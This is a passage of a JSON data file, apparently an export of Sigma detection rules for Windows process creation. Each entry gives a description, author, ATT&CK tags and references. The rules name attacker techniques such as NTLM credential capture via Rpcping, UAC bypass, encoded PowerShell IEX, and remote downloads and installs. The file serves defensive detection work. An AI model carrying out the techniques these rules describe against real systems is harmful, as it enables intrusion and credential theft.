"Legitimate calls to system binaries", "Company specific internal usage" ], "filename": "proc_creation_win_java_susp_child_process_2.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_susp_child_process_2.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", "value": "Shell Process Spawned by Java.EXE" }, { "description": "Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_htran_or_natbypass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cw1997/NATBypass", "https://github.com/HiwinCN/HTran", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml" ], "tags": [ "attack.command-and-control", "attack.t1090", "attack.s0040" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "value": "HackTool - Htran/NATBypass Execution" }, { "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", "meta": { "author": "Sreeman", "creation_date": "2020-03-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" ], "tags": [ "attack.t1204", "attack.t1566.001", "attack.execution", "attack.initial-access" ] }, "related": [ { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" }, { "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_dismhost.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", "value": "UAC Bypass Using DismHost" }, { "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rpcping_credential_capture.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", "https://twitter.com/vysecurity/status/873181705024266241", "https://twitter.com/vysecurity/status/974806438316072960", "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", "value": "Capture Credentials with Rpcping.exe" }, { "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_service_creation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "value": "Suspicious New Service Creation" }, { "description": "Detects usage of a base64 encoded \"IEX\" cmdlet in a process command line", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_iex.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", "value": "PowerShell Base64 Encoded IEX Cmdlet" }, { "description": "Detects a suspicious or uncommon parent processes of PowerShell", "meta": { "author": "Teymur Kheirkhabarov, Harish Segar", "creation_date": "2020-03-20", "falsepositive": [ "Other scripts" ], "filename": "proc_creation_win_powershell_susp_parent_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parent_process.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", "value": "Suspicious PowerShell Parent Process" }, { "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Other programs that cause these patterns (please report)" ], "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021" ] }, "related": [ { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", "value": "Privilege Escalation via Named Pipe Impersonation" }, { "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", "meta": { "author": "Jonhnathan Ribeiro, oscd.community", "creation_date": "2020-10-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_sdset_deny_service_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml" ], "tags": [ "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "value": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE" }, { "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", "meta": { "author": "frack113", "creation_date": "2022-09-25", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_w32tm.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" ], "tags": [ "attack.discovery", "attack.t1124" ] }, "related": [ { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", "value": "Use of W32tm as Timer" }, { "description": "Detects when a share is mounted using the \"net.exe\" utility", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-02", "falsepositive": [ "Legitimate activity by administrators and scripts" ], "filename": "proc_creation_win_net_use_mount_share.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_share.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f117933c-980c-4f78-b384-e3d838111165", "value": "Windows Share Mount Via Net.EXE" }, { "description": "Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.\nThreat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.\n", "meta": { "author": "@kostastsale", "creation_date": "2024-08-16", "falsepositive": [ "UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios." ], "filename": "proc_creation_win_rundll32_udl_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://trustedsec.com/blog/oops-i-udld-it-again", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_udl_exec.yml" ], "tags": [ "attack.execution", "attack.t1218.011", "attack.t1071" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ea52357-cd59-4340-9981-c46c7e900428", "value": "Potentially Suspicious Rundll32.EXE Execution of UDL File" }, { "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", "meta": { "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate OpenVPN TAP installation" ], "filename": "proc_creation_win_tapinstall_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tapinstall_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99793437-3e16-439b-be0f-078782cf953d", "value": "Tap Installer Execution" }, { "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", "meta": { "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-13", "falsepositive": [ "System administrator Usage" ], "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", "value": "Permission Check Via Accesschk.EXE" }, { "description": "Detects potentially suspicious file downloads from file sharing domains using wget.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wget_download_susp_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml" ], "tags": [ "attack.execution" ] }, "uuid": "a0d7e4d2-bede-4141-8896-bc6e237e977c", "value": "Suspicious File Download From File Sharing Domain Via Wget.EXE" }, { "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msiexec_install_remote.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "value": "Suspicious Msiexec Quiet Install From Remote Location" }, { "description": "Detects the export of the target Registry key to a file.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Legitimate export of keys" ], "filename": "proc_creation_win_regedit_export_keys.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ "attack.exfiltration", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", "value": "Exports Registry Key To a File" }, { "description": "Local accounts, System Owner/User discovery using operating systems utilities", "meta": { "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate administrator or user enumerates local users for legitimate reason" ], "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1087.001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "502b42de-4306-40b4-9596-6f590c81f073", "value": "Local Accounts Discovery" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_invocation_specific.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invocation_specific.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "536e2947-3729-478c-9903-745aaffe60d2", "value": "Suspicious PowerShell Invocations - Specific - ProcessCreation" }, { "description": "Detects execution of 7z in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-27", "falsepositive": [ "Legitimate use of 7z with a command line in which \".dmp\" or \".dump\" appears accidentally", "Legitimate use of 7z to compress WER \".dmp\" files for troubleshooting" ], "filename": "proc_creation_win_7zip_exfil_dmp_files.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "value": "7Zip Compressing Dump Files" }, { "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", "meta": { "author": "Florian Roth (Nextron Systems), Hieu Tran", "creation_date": "2023-03-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_download_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.t1059.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "value": "Potential DLL File Download Via PowerShell Invoke-WebRequest" }, { "description": "Detects the execution of a renamed \"gpg.exe\". Often used by ransomware and loaders to decrypt/encrypt data.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2023-08-09", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_renamed_gpg4win.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securelist.com/locked-out/68960/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec0722a3-eb5c-4a56-8ab2-bf6f20708592", "value": "Renamed Gpg.EXE Execution" }, { "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", "meta": { "author": "Konstantin Grishchenko, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", "https://twitter.com/pabraeken/status/993497996179492864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", "value": "Suspicious VBoxDrvInst.exe Parameters" }, { "description": "Detects execution of \"tar.exe\" in order to create a compressed file.\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), AdmU3", "creation_date": "2023-12-19", "falsepositive": [ "Likely" ], "filename": "proc_creation_win_tar_compression.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://unit42.paloaltonetworks.com/chromeloader-malware/", "https://lolbas-project.github.io/lolbas/Binaries/Tar/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_compression.yml" ], "tags": [ "attack.collection", "attack.exfiltration", "attack.t1560", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "418a3163-3247-4b7b-9933-dcfcb7c52ea9", "value": "Compressed File Creation Via Tar.EXE" }, { "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", "value": "Remote File Download Via Desktopimgdownldr Utility" }, { "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-07-15", "falsepositive": [ "Software installation" ], "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "970823b7-273b-460a-8afc-3a6811998529", "value": "Uncommon One Time Only Scheduled Task At 00:00" }, { "description": "Detects uncommon \"conhost\" child processes. This could be a sign of \"conhost\" usage as a LOLBIN or potential process injection activity.", "meta": { "author": "omkar72", "creation_date": "2020-10-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_conhost_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", "value": "Uncommon Child Process Of Conhost.EXE" }, { "description": "Detects installation of a new shim using sdbinst.exe.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims\n", "meta": { "author": "Markus Neis", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sdbinst_shim_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", "value": "Potential Shim Database Persistence via Sdbinst.EXE" }, { "description": "Detects audio capture via PowerShell Cmdlet.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate audio capture by legitimate user." ], "filename": "proc_creation_win_powershell_audio_capture.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/frgnca/AudioDeviceCmdlets", "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", "value": "Audio Capture via PowerShell" }, { "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpview.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", "https://github.com/tevora-threat/SharpView/", "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml" ], "tags": [ "attack.discovery", "attack.t1049", "attack.t1069.002", "attack.t1482", 